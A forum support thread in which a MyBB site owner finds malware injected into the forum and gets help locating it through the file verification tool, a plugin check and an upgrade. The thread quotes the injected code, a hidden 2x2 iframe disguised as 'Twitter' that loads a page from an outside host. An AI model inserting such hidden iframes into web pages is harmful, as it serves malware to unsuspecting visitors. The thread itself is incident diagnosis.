My website was hit with some code injection. The myBB forums was injected with code in a rather unusual place.
By viewing the website source code, check out the header (I shortened it to make it easier to read)
<script type=...></script>
<iframe name="Twitter" src="http://bsmartens.com/ewzs.html?j=1275972" align="middle" frameborder="no" height="2" scrolling="auto" width="2"></iframe>
<link type="text/css" rel="stylesheet" href=".../global.css">
Somehow this guy stuck an iframe in the middle of my header, between linking the javascript and css files.
I looked through the templates and it looks like the injection is in {$stylesheets}, but I can't seem to find that template anywhere. Any ideas?
Thanks.
$stylesheets is not in a template - it's simply a variable. Have you checked the headerinclude template?
I thought so, and yes I checked it:
<script type="text/javascript" src="{$mybb->settings['bburl']}/jscripts/popup_menu.js?ver=1400"></script>
{$stylesheets}
<script type="text/javascript">
The injected iFrame is located between the popup_menu.js, and the first css file. So it's somewhere in the {$stylesheets}, though I can't seem to locate it anywhere...
That's strange. {$stylehseets} is defined in the core. have you ran the file verification tool via the ACP?
Ah, I wasn't aware of the file verification tool. It just generated a report for me, I'll go through all the changed files and see if I can find anything.
Also, thanks for your help thus far, I appreciate it
Edit:
It the iframe seems to have been placed in 10-15 various files, right before the "</body>" tag. Would this be from some sort of myBB security vulnerability?
There aren't any known security vulnerabilities in the core that we're aware of that haven't been patched. Are you running any plugins?
I'm running a few basic plugins, mostly just passive ones that give some unique CSS functionality to the forums. (Make locked thread titles appear greyed out, banned members' posts appear greyed out), disallow complex usernames.
The two only big ones I'm using are myShoutBox and Advanced WYSIWYG Editor. Also, I'm on version 1.6.8. I didn't upgrade to 1.6.9 in fear of losing all the visual changes I made to the templates.
Once again I'm greatly thankful for your help
Edit:
Edited this part out by accident, website was
http://sky9games.com/community/, though the problem was fixed by now.
I'd definitely advise upgrading to 1.6.9 ASAP.
When visiting your site, Chrome warns me of Malware being detected which I guess is from that iFrame.
Yep, looks like every single .js file had the iframe inserted into it. One last question, will upgrading to 1.6.9 change only the core files, and keep all my templates intact?
I made a number of small changes to some core files, though I guess I can always go back and replace them.
Yes, all templates an stylehseets should be fine, though we do recommend backing up your database before hand whenever updating.